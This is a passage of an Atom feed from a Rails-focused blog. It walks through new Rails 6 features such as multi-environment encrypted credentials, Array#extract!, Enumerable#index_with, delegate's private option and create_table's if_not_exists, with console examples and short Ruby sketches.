      <id>https://www.bigbinary.com/blog/rails-6-adds-support-for-multi-environment-credentials</id>
<content type="html"><![CDATA[<p>In Rails 5.2, encrypted credentials are stored in the file <code>config/credentials.yml.enc</code>. This is a single flat file which is encrypted by the key located in <code>config/master.key</code>.</p><p>Rails 5.2 does not support storing credentials of different environments with different encryption keys. If we want environment-specific encrypted credentials, we'll have to follow <a href="https://github.com/rails/rails/pull/33521#issuecomment-449403068">this workaround</a>.</p><p>Rails 6 has added support for Multi Environment credentials. With this change, credentials that belong to different environments can be stored in separate files with their own encryption keys.</p><p>Let's see how this works in Rails 6.0.0.beta3.</p><h2>Rails 6.0.0.beta3</h2><p>If we want to add credentials to be used in the staging environment, we can run</p><pre><code class="language-bash">rails credentials:edit --environment staging</code></pre><p>This will create the credentials file <code>config/credentials/staging.yml.enc</code> and a staging-specific encryption key <code>config/credentials/staging.key</code>, and open the credentials file in your text editor.</p><p>Let's add our AWS access key id here.</p><pre><code class="language-yaml">aws:
  access_key_id: &quot;STAGING_KEY&quot;</code></pre><p>We can then access the access_key_id in the staging environment.</p><pre><code class="language-ruby">$ RAILS_ENV=staging rails c
pry(main)&gt; Rails.application.credentials.aws[:access_key_id]
=&gt; &quot;STAGING_KEY&quot;</code></pre><h2>Which takes precedence: Global or Environment Specific credentials?</h2><p>Credentials added to the global file <code>config/credentials.yml.enc</code> <a href="https://github.com/rails/rails/pull/33521#issuecomment-412382031">will not be loaded</a> in environments which have their own environment-specific credentials file (<code>config/credentials/$environment.yml.enc</code>).</p><p>So if we decide to add the following to the global
credentials file, these credentials will not be available in staging, since we already have an environment-specific credentials file for staging.</p><pre><code class="language-yaml">aws:
  access_key_id: &quot;DEFAULT_KEY&quot;
stripe:
  secret_key: &quot;DEFAULT_SECRET_KEY&quot;</code></pre><pre><code class="language-ruby">$ RAILS_ENV=staging rails c
pry(main)&gt; Rails.application.credentials.aws[:access_key_id]
=&gt; &quot;STAGING_KEY&quot;
pry(main)&gt; Rails.application.credentials.stripe[:secret_key]
Traceback (most recent call last):
        1: from (irb):6
NoMethodError (undefined method `[]' for nil:NilClass)</code></pre><p>Here is the <a href="https://github.com/rails/rails/pull/33521">relevant pull request</a>.</p>]]></content>
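Conceptually, each environment-specific credentials file is just a YAML payload encrypted with that environment's own random key. A rough, self-contained sketch of that idea using the standard library's OpenSSL (illustrative only; Rails' real implementation is `ActiveSupport::EncryptedConfiguration`, and the `encrypt`/`decrypt` helpers here are invented):

```ruby
require "openssl"
require "yaml"

# Encrypt a plaintext with AES-256-GCM; returns iv + ciphertext + auth tag.
def encrypt(plaintext, key)
  cipher = OpenSSL::Cipher.new("aes-256-gcm").encrypt
  cipher.key = key
  iv = cipher.random_iv                  # 12 bytes for GCM
  ciphertext = cipher.update(plaintext) + cipher.final
  iv + ciphertext + cipher.auth_tag      # 16-byte auth tag
end

# Reverse of encrypt: split the blob back into iv/ciphertext/tag and decrypt.
def decrypt(blob, key)
  iv, ciphertext, tag = blob[0, 12], blob[12..-17], blob[-16..-1]
  cipher = OpenSSL::Cipher.new("aes-256-gcm").decrypt
  cipher.key = key
  cipher.iv = iv
  cipher.auth_tag = tag
  cipher.update(ciphertext) + cipher.final
end

staging_key = OpenSSL::Random.random_bytes(32)  # plays the role of config/credentials/staging.key
plaintext   = { "aws" => { "access_key_id" => "STAGING_KEY" } }.to_yaml

encrypted   = encrypt(plaintext, staging_key)   # plays the role of config/credentials/staging.yml.enc
credentials = YAML.safe_load(decrypt(encrypted, staging_key))
credentials.dig("aws", "access_key_id")         # => "STAGING_KEY"
```

Because each environment owns its key, the staging key can be shared with a deploy target without exposing production secrets.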
    </entry><entry>
       <title><![CDATA[Rails 6 adds before? and after? to Date and Time]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-before-and-after-to-date-and-time"/>
      <updated>2019-06-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-before-and-after-to-date-and-time</id>
<content type="html"><![CDATA[<p>Rails 6 adds <a href="https://github.com/rails/rails/pull/32185">before?</a> and <a href="https://github.com/rails/rails/pull/32185">after?</a> to the <a href="https://api.rubyonrails.org/v5.2/classes/Date.html">Date</a>, <a href="https://api.rubyonrails.org/v5.2/classes/DateTime.html">DateTime</a>, <a href="https://api.rubyonrails.org/v5.2/classes/Time.html">Time</a> and <a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/TimeWithZone.html">ActiveSupport::TimeWithZone</a> classes.</p><p><a href="https://github.com/rails/rails/pull/32185">before?</a> and <a href="https://github.com/rails/rails/pull/32185">after?</a> are aliases of the <a href="https://api.rubyonrails.org/v5.2/classes/Date.html#method-i-3C-3D-3E">&lt; (less than)</a> and <a href="https://api.rubyonrails.org/v5.2/classes/Date.html#method-i-3C-3D-3E">&gt; (greater than)</a> methods, respectively.</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><p>Let's try calling <code>before?</code> on a date object in Rails 5.2.</p><pre><code class="language-ruby">&gt;&gt; Date.new(2019, 3, 31).before?(Date.new(2019, 4, 1))
NoMethodError: undefined method 'before?'
for Sun, 31 Mar 2019:Date
from (irb):1
&gt;&gt; Date.new(2019, 3, 31) &lt; Date.new(2019, 4, 1)
=&gt; true</code></pre><h4>Rails 6.0.0.beta2</h4><p>Now, let's compare <a href="https://api.rubyonrails.org/v5.2/classes/Date.html">Date</a>, <a href="https://api.rubyonrails.org/v5.2/classes/DateTime.html">DateTime</a>, <a href="https://api.rubyonrails.org/v5.2/classes/Time.html">Time</a> and <a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/TimeWithZone.html">ActiveSupport::TimeWithZone</a> objects using <a href="https://github.com/rails/rails/pull/32185">before?</a> and <a href="https://github.com/rails/rails/pull/32185">after?</a> in Rails 6.</p><pre><code class="language-ruby">&gt;&gt; Date.new(2019, 3, 31).before?(Date.new(2019, 4, 1))
=&gt; true
&gt;&gt; Date.new(2019, 3, 31).after?(Date.new(2019, 4, 1))
=&gt; false
&gt;&gt; DateTime.parse('2019-03-31').before?(DateTime.parse('2019-04-01'))
=&gt; true
&gt;&gt; DateTime.parse('2019-03-31').after?(DateTime.parse('2019-04-01'))
=&gt; false
&gt;&gt; Time.parse('2019-03-31').before?(Time.parse('2019-04-01'))
=&gt; true
&gt;&gt; Time.parse('2019-03-31').after?(Time.parse('2019-04-01'))
=&gt; false
&gt;&gt; ActiveSupport::TimeWithZone.new(Time.utc(2019, 3, 31, 12, 0, 0), ActiveSupport::TimeZone[&quot;Eastern Time (US &amp; Canada)&quot;]).before?(ActiveSupport::TimeWithZone.new(Time.utc(2019, 4, 1, 12, 0, 0), ActiveSupport::TimeZone[&quot;Eastern Time (US &amp; Canada)&quot;]))
=&gt; true
&gt;&gt; ActiveSupport::TimeWithZone.new(Time.utc(2019, 3, 31, 12, 0, 0), ActiveSupport::TimeZone[&quot;Eastern Time (US &amp; Canada)&quot;]).after?(ActiveSupport::TimeWithZone.new(Time.utc(2019, 4, 1, 12, 0, 0), ActiveSupport::TimeZone[&quot;Eastern Time (US &amp; Canada)&quot;]))
=&gt; false</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/32185">pull request</a> for adding the <code>before?</code> and <code>after?</code> methods and the <a href="https://github.com/rails/rails/pull/32398">pull request</a>
for moving <code>before?</code> and <code>after?</code> to <a href="https://api.rubyonrails.org/v5.2/classes/DateAndTime/Calculations.html">DateAndTime::Calculations</a>.</p>]]></content>
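Since `before?` and `after?` are plain aliases of `<` and `>`, their behaviour can be reproduced in plain Ruby without Rails. A minimal sketch (this patch is illustrative; Rails defines the real methods in `DateAndTime::Calculations`):

```ruby
require "date"

# before? and after? are just aliases of < and > (which Date gets from
# Comparable via <=>). This mirrors the idea so it runs without Rails.
class Date
  alias_method :before?, :<
  alias_method :after?,  :>
end

Date.new(2019, 3, 31).before?(Date.new(2019, 4, 1)) # => true
Date.new(2019, 3, 31).after?(Date.new(2019, 4, 1))  # => false
```

The readability win is the point: `deadline.before?(Date.today)` reads more naturally in domain code than `deadline < Date.today`.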
    </entry><entry>
       <title><![CDATA[Rails 6 adds Array#extract!]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-array-extract"/>
      <updated>2019-06-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-array-extract</id>
<content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/33137">extract!</a> on the <a href="https://api.rubyonrails.org/v5.2/classes/Array.html">Array</a> class. <a href="https://github.com/rails/rails/pull/33137">extract!</a> removes and returns the elements for which the given block returns true.</p><p><a href="https://github.com/rails/rails/pull/33137">extract!</a> differs from <a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-reject-21">reject!</a> in that <a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-reject-21">reject!</a> returns the array after removing the elements, whereas <a href="https://github.com/rails/rails/pull/33137">extract!</a> returns the elements removed from the array.</p><p>Let's check out how it works.</p><h4>Rails 6.0.0.beta2</h4><p>Let's pluck all the user emails and then extract the emails which include <code>gmail.com</code>.</p><pre><code class="language-ruby">&gt;&gt; emails = User.pluck(:email)
SELECT &quot;users&quot;.&quot;email&quot; FROM &quot;users&quot;
=&gt; [&quot;amit.choudhary@bigbinary.com&quot;, &quot;amit@gmail.com&quot;, &quot;mark@gmail.com&quot;, &quot;sam@gmail.com&quot;]
&gt;&gt; emails.extract! { |email| email.include?('gmail.com') }
=&gt; [&quot;amit@gmail.com&quot;, &quot;mark@gmail.com&quot;, &quot;sam@gmail.com&quot;]
&gt;&gt; emails
=&gt; [&quot;amit.choudhary@bigbinary.com&quot;]
&gt;&gt; emails = User.pluck(:email)
SELECT &quot;users&quot;.&quot;email&quot; FROM &quot;users&quot;
=&gt; [&quot;amit.choudhary@bigbinary.com&quot;, &quot;amit@gmail.com&quot;, &quot;mark@gmail.com&quot;, &quot;sam@gmail.com&quot;]
&gt;&gt; emails.reject! { |email| email.include?('gmail.com') }
=&gt; [&quot;amit.choudhary@bigbinary.com&quot;]
&gt;&gt; emails
=&gt; [&quot;amit.choudhary@bigbinary.com&quot;]</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/33137">pull request</a>.</p>]]></content>
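A plain-Ruby re-creation of `extract!`, modeled on the Rails implementation (which is built on `reject!`), makes the difference from `reject!` concrete; this is an illustrative sketch, runnable without Rails:

```ruby
# Remove and return the elements for which the block is truthy.
# When the block returns true, `extracted_elements << element` is truthy,
# so reject! drops the element; otherwise the if-expression is nil and
# the element is kept.
class Array
  def extract!
    extracted_elements = []
    reject! do |element|
      extracted_elements << element if yield(element)
    end
    extracted_elements
  end
end

emails = ["amit.choudhary@bigbinary.com", "amit@gmail.com", "mark@gmail.com"]
gmail  = emails.extract! { |email| email.include?("gmail.com") }
gmail   # => ["amit@gmail.com", "mark@gmail.com"]
emails  # => ["amit.choudhary@bigbinary.com"]
```

In one pass you get both partitions: the removed elements as the return value and the kept elements mutated in place.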
    </entry><entry>
       <title><![CDATA[Rails 6 adds Enumerable#index_with]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-enumerable-index_with"/>
      <updated>2019-06-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-enumerable-index_with</id>
<content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/32523">index_with</a> on the <a href="https://api.rubyonrails.org/v5.2/classes/Enumerable.html">Enumerable</a> module. This helps in creating a hash from an enumerable with default or fetched values.</p><p>Before Rails 6, we could achieve this by calling <a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-map">map</a> along with <a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-to_h">to_h</a>.</p><p><a href="https://github.com/rails/rails/pull/32523">index_with</a> takes either a value or a block as a parameter.</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><p>Let's create a hash from an array in Rails 5.2 using <a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-map">map</a> and <a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-to_h">to_h</a>.</p><pre><code class="language-ruby">&gt;&gt; address = Address.first
SELECT &quot;addresses&quot;.* FROM &quot;addresses&quot; ORDER BY &quot;addresses&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; #&lt;Address id: 1, first_name: &quot;Amit&quot;, last_name: &quot;Choudhary&quot;, state: &quot;California&quot;, created_at: &quot;2019-03-21 10:03:57&quot;, updated_at: &quot;2019-03-21 10:03:57&quot;&gt;
&gt;&gt; NAME_ATTRIBUTES = [:first_name, :last_name]
=&gt; [:first_name, :last_name]
&gt;&gt; NAME_ATTRIBUTES.map { |attr| [attr, address.public_send(attr)] }.to_h
=&gt; {:first_name=&gt;&quot;Amit&quot;, :last_name=&gt;&quot;Choudhary&quot;}</code></pre><h4>Rails 6.0.0.beta2</h4><p>Now let's create the same hash from the array using <a href="https://github.com/rails/rails/pull/32523">index_with</a> in Rails 6.</p><pre><code class="language-ruby">&gt;&gt; address = Address.first
SELECT &quot;addresses&quot;.* FROM &quot;addresses&quot; ORDER BY &quot;addresses&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; #&lt;Address id:
1, first_name: &quot;Amit&quot;, last_name: &quot;Choudhary&quot;, state: &quot;California&quot;, created_at: &quot;2019-03-21 10:02:47&quot;, updated_at: &quot;2019-03-21 10:02:47&quot;&gt;
&gt;&gt; NAME_ATTRIBUTES = [:first_name, :last_name]
=&gt; [:first_name, :last_name]
&gt;&gt; NAME_ATTRIBUTES.index_with { |attr| address.public_send(attr) }
=&gt; {:first_name=&gt;&quot;Amit&quot;, :last_name=&gt;&quot;Choudhary&quot;}
&gt;&gt; NAME_ATTRIBUTES.index_with('Default')
=&gt; {:first_name=&gt;&quot;Default&quot;, :last_name=&gt;&quot;Default&quot;}</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/32523">pull request</a>.</p>]]></content>
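The behaviour of `index_with` can be sketched in a few lines of plain Ruby (a simplified version for illustration; Rails' real implementation also handles the no-block, no-default case by returning an enumerator):

```ruby
# Build a hash keyed by each element, with either the block's result
# or a fixed default as the value. Simplified stand-in for Rails'
# Enumerable#index_with.
module Enumerable
  def index_with(default = nil)
    result = {}
    each do |element|
      result[element] = block_given? ? yield(element) : default
    end
    result
  end
end

[:first_name, :last_name].index_with("Default")
# => {:first_name=>"Default", :last_name=>"Default"}
[1, 2, 3].index_with { |n| n * n }
# => {1=>1, 2=>4, 3=>9}
```

Compared with `map { ... }.to_h`, this states the intent directly and avoids building the intermediate array of pairs.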
    </entry><entry>
       <title><![CDATA[Rails 6 adds private option to delegate method]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-private-option-to-delegate-method"/>
      <updated>2019-06-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-private-option-to-delegate-method</id>
<content type="html"><![CDATA[<p>Rails 6 adds a <code>:private</code> option to the <a href="https://api.rubyonrails.org/v5.2/classes/Module.html#method-i-delegate">delegate</a> method. With this addition, we can delegate methods in the private scope.</p><p>Let's check out how it works.</p><h4>Rails 6.0.0.beta2</h4><p>Let's create two models named <code>Address</code> and <code>Order</code>. Let's also delegate the <code>validate_state</code> method in <code>Order</code> to <code>Address</code>.</p><pre><code class="language-ruby">class Address &lt; ApplicationRecord
  validates :first_name, :last_name, :state, presence: true

  DELIVERABLE_STATES = ['New York']

  def validate_state
    unless DELIVERABLE_STATES.include?(state)
      errors.add(:state, :invalid)
    end
  end
end

class Order &lt; ApplicationRecord
  belongs_to :address

  delegate :validate_state, to: :address
end

&gt;&gt; Order.first
SELECT &quot;orders&quot;.* FROM &quot;orders&quot; ORDER BY &quot;orders&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; #&lt;Order id: 1, amount: 0.1e2, address_id: 1, created_at: &quot;2019-03-21 10:02:58&quot;, updated_at: &quot;2019-03-21 10:17:44&quot;&gt;
&gt;&gt; Address.first
SELECT &quot;addresses&quot;.* FROM &quot;addresses&quot; ORDER BY &quot;addresses&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; #&lt;Address id: 1, first_name: &quot;Amit&quot;, last_name: &quot;Choudhary&quot;, state: &quot;California&quot;, created_at: &quot;2019-03-21 10:02:47&quot;, updated_at: &quot;2019-03-21 10:02:47&quot;&gt;
&gt;&gt; Order.first.validate_state
SELECT &quot;orders&quot;.* FROM &quot;orders&quot; ORDER BY &quot;orders&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
SELECT &quot;addresses&quot;.* FROM &quot;addresses&quot; WHERE &quot;addresses&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]
=&gt; [&quot;is invalid&quot;]</code></pre><p>Now, let's add <code>private: true</code> to the delegation.</p><pre><code
class="language-ruby">class Order &lt; ApplicationRecord
  belongs_to :address

  delegate :validate_state, to: :address, private: true
end

&gt;&gt; Order.first.validate_state
SELECT &quot;orders&quot;.* FROM &quot;orders&quot; ORDER BY &quot;orders&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; Traceback (most recent call last):
        1: from (irb):7
NoMethodError (private method 'validate_state' called for #&lt;Order:0x00007fb9d72fc1f8&gt;
Did you mean?  validate)</code></pre><p>As we can see, Rails now raises a <code>NoMethodError</code> for calling a private method when the <code>private</code> option is set on <code>delegate</code>.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/31944">pull request</a>.</p>]]></content>
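The essence of delegation with a `:private` option can be sketched with a tiny macro in plain Ruby (illustrative only; `tiny_delegate` and the `Address`/`Order` classes below are simplified stand-ins, not Rails' `Module#delegate` or Active Record models):

```ruby
class Module
  # Define a method that forwards to another object, optionally marking
  # the generated method private (the idea behind delegate's :private option).
  def tiny_delegate(method_name, to:, private: false)
    define_method(method_name) do |*args, &block|
      send(to).public_send(method_name, *args, &block)
    end
    send(:private, method_name) if private
  end
end

class Address
  def validate_state
    "is invalid"
  end
end

class Order
  attr_reader :address

  def initialize(address)
    @address = address
  end

  tiny_delegate :validate_state, to: :address, private: true
end

order = Order.new(Address.new)
order.respond_to?(:validate_state) # => false, the delegated method is private
order.send(:validate_state)        # => "is invalid"
```

Calling `order.validate_state` directly raises `NoMethodError`, mirroring the traceback shown above: the delegation exists, but only for the object's internal use.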
    </entry><entry>
       <title><![CDATA[Rails 6 allows spaces in postgres table names]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-allows-spaces-in-postgres-table-names"/>
      <updated>2019-06-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-allows-spaces-in-postgres-table-names</id>
<content type="html"><![CDATA[<p>Rails 6 allows spaces in table names in PostgreSQL. Before Rails 6, if we tried to create a table named <code>user reviews</code>, Rails would try to create a table named <code>reviews</code> in a schema named <code>user</code>.</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><p>Let's create a table <code>user reviews</code> in Rails 5.2.</p><pre><code class="language-ruby">&gt;&gt; class CreateUserReviews &lt; ActiveRecord::Migration[5.2]
&gt;&gt;   def change
&gt;&gt;     create_table 'user reviews' do |t|
&gt;&gt;       t.string :value
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;   end
&gt;&gt; end
=&gt; :change
&gt;&gt; CreateUserReviews.new.change
-- create_table(&quot;user reviews&quot;)
CREATE TABLE &quot;user&quot;.&quot;reviews&quot; (&quot;id&quot; bigserial primary key, &quot;value&quot; character varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)
=&gt; Traceback (most recent call last):
        2: from (irb):10
        1: from (irb):3:in 'change'
ActiveRecord::StatementInvalid (PG::InvalidSchemaName: ERROR:  schema &quot;user&quot; does not exist)
LINE 1: CREATE TABLE &quot;user&quot;.&quot;reviews&quot; (&quot;id&quot; bigserial primary key, &quot;...
^: CREATE TABLE &quot;user&quot;.&quot;reviews&quot; (&quot;id&quot; bigserial primary key, &quot;value&quot; character varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)</code></pre><p>We can see that Rails 5.2 raised an exception and tried to create a table named <code>reviews</code> in the <code>user</code> schema.</p><h4>Rails 6.0.0.beta2</h4><p>Now, let's create a table <code>user reviews</code> in Rails 6.</p><pre><code class="language-ruby">&gt;&gt; class CreateUserReviews &lt; ActiveRecord::Migration[6.0]
&gt;&gt;   def change
&gt;&gt;     create_table 'user reviews' do |t|
&gt;&gt;       t.string :value
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;   end
&gt;&gt; end
=&gt; :change
&gt;&gt; CreateUserReviews.new.change
-- create_table(&quot;user reviews&quot;)
CREATE TABLE &quot;user reviews&quot; (&quot;id&quot; bigserial primary key, &quot;value&quot; character varying, &quot;created_at&quot; timestamp(6) NOT NULL, &quot;updated_at&quot; timestamp(6) NOT NULL)
=&gt; #&lt;PG::Result:0x00007f9d633c5458 status=PGRES_COMMAND_OK ntuples=0 nfields=0 cmd_tuples=0&gt;</code></pre><p>Now, we can see that the generated SQL is correct and Rails successfully created a table named <code>user reviews</code>.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/34561">pull request</a>.</p>]]></content>
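The difference comes down to identifier handling: treating `user reviews` as one identifier to be quoted yields valid SQL, while splitting it into a schema part and a table part does not. A hedged plain-Ruby sketch of that quoting idea (the `quote_table_name` helper here is invented for illustration; Rails' real parsing lives in the PostgreSQL adapter):

```ruby
# Quote a table name for PostgreSQL. Only an explicit dot separates
# schema from table; everything else (including spaces) stays inside
# one quoted identifier.
def quote_table_name(name)
  if name.include?(".")
    schema, table = name.split(".", 2)
    %("#{schema}"."#{table}")
  else
    %("#{name}")
  end
end

quote_table_name("user reviews") # => "\"user reviews\""
quote_table_name("public.users") # => "\"public\".\"users\""
```

With the whole name quoted, the generated `CREATE TABLE "user reviews" (...)` matches the Rails 6 output shown above.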
    </entry><entry>
       <title><![CDATA[Rails 6 adds if_not_exists option to create_table]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-if_not_exists-option-to-create_table"/>
      <updated>2019-05-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-if_not_exists-option-to-create_table</id>
<content type="html"><![CDATA[<p>Rails 6 added an <a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> option to <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-create_table">create_table</a> to create a table only if it doesn't already exist.</p><p>Before Rails 6, we could use <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-table_exists-3F">ActiveRecord::Base.connection.table_exists?</a>.</p><p>The default value of the <a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> option is <code>false</code>.</p><h4>Rails 5.2</h4><p>Let's create a <code>users</code> table in Rails 5.2.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[5.2]
&gt;&gt;   def change
&gt;&gt;     create_table :users do |t|
&gt;&gt;       t.string :name, index: { unique: true }
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;   end
&gt;&gt; end
&gt;&gt; CreateUsers.new.change
-- create_table(:users)
CREATE TABLE &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)
=&gt; #&lt;PG::Result:0x00007fd73e711cf0 status=PGRES_COMMAND_OK ntuples=0 nfields=0 cmd_tuples=0&gt;</code></pre><p>Now let's try creating the <code>users</code> table again with the <a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> option.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[5.2]
&gt;&gt;   def change
&gt;&gt;     create_table :users, if_not_exists: true do |t|
&gt;&gt;       t.string :name, index: { unique: true }
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;   end
&gt;&gt; end
&gt;&gt; CreateUsers.new.change
-- create_table(:users, {:if_not_exists=&gt;true})
CREATE TABLE &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character
varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)
=&gt; Traceback (most recent call last):
        2: from (irb):121
        1: from (irb):114:in 'change'
ActiveRecord::StatementInvalid (PG::DuplicateTable: ERROR:  relation &quot;users&quot; already exists)
: CREATE TABLE &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)</code></pre><p>We can see that Rails 5.2 ignored the <a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> option and tried creating the table again.</p><p>Now let's try <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-table_exists-3F">ActiveRecord::Base.connection.table_exists?</a> with Rails 5.2.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[5.2]
&gt;&gt;   def change
&gt;&gt;     unless ActiveRecord::Base.connection.table_exists?('users')
&gt;&gt;       create_table :users do |t|
&gt;&gt;         t.string :name
&gt;&gt;
&gt;&gt;         t.timestamps
&gt;&gt;       end
&gt;&gt;     end
&gt;&gt;   end
&gt;&gt; end
&gt;&gt; CreateUsers.new.change
=&gt; nil</code></pre><p>We can see that <code>create_table :users</code> never executed because <code>ActiveRecord::Base.connection.table_exists?('users')</code> returned true.</p><h4>Rails 6.0.0.beta2</h4><p>Let's create the <code>users</code> table in Rails 6 with the <a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> option set to true.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[6.0]
&gt;&gt;   def change
&gt;&gt;     create_table :users, if_not_exists: true do |t|
&gt;&gt;       t.string :name, index: { unique: true }
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;   end
&gt;&gt; end
&gt;&gt; CreateUsers.new.change
-- create_table(:users,
{:if_not_exists=&gt;true})
CREATE TABLE IF NOT EXISTS &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp(6) NOT NULL, &quot;updated_at&quot; timestamp(6) NOT NULL)
=&gt; #&lt;PG::Result:0x00007fc4614fef48 status=PGRES_COMMAND_OK ntuples=0 nfields=0 cmd_tuples=0&gt;
&gt;&gt; CreateUsers.new.change
-- create_table(:users, {:if_not_exists=&gt;true})
CREATE TABLE IF NOT EXISTS &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp(6) NOT NULL, &quot;updated_at&quot; timestamp(6) NOT NULL)
=&gt; #&lt;PG::Result:0x00007fc46513fde0 status=PGRES_COMMAND_OK ntuples=0 nfields=0 cmd_tuples=0&gt;</code></pre><p>We can see that no exception was raised when we tried creating the <code>users</code> table the second time.</p><p>Now let's see what happens if we set <a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> to false.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[6.0]
&gt;&gt;   def change
&gt;&gt;     create_table :users, if_not_exists: false do |t|
&gt;&gt;       t.string :name, index: { unique: true }
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;   end
&gt;&gt; end
&gt;&gt; CreateUsers.new.change
-- create_table(:users, {:if_not_exists=&gt;false})
CREATE TABLE &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp(6) NOT NULL, &quot;updated_at&quot; timestamp(6) NOT NULL)
=&gt; Traceback (most recent call last):
        2: from (irb):23
        1: from (irb):15:in `change'
ActiveRecord::StatementInvalid (PG::DuplicateTable: ERROR:  relation &quot;users&quot; already exists)</code></pre><p>As we can see, Rails raised an exception here because <a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> was set to false.</p><p>Here is the relevant <a
href="https://github.com/rails/rails/pull/31382">pull request</a>.</p>]]></content>
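The effect of the option on the generated DDL can be sketched with a tiny SQL builder (illustrative only; `create_table_sql` is an invented helper, not Rails' API, and the column list is reduced to the primary key):

```ruby
# Prepend IF NOT EXISTS to the CREATE TABLE statement when requested,
# mirroring the difference visible in the console output above.
def create_table_sql(name, if_not_exists: false)
  keyword = if_not_exists ? "CREATE TABLE IF NOT EXISTS" : "CREATE TABLE"
  %(#{keyword} "#{name}" ("id" bigserial primary key))
end

create_table_sql("users")
# => "CREATE TABLE \"users\" (\"id\" bigserial primary key)"
create_table_sql("users", if_not_exists: true)
# => "CREATE TABLE IF NOT EXISTS \"users\" (\"id\" bigserial primary key)"
```

With `IF NOT EXISTS`, PostgreSQL silently skips creation when the relation already exists, which is why the second run above succeeds instead of raising `PG::DuplicateTable`.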
    </entry><entry>
       <title><![CDATA[Rails 6 has added a way to change the database of the app]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-has-added-a-way-to-change-the-database-of-the-app"/>
      <updated>2019-04-30T12:00:00+00:00</updated>
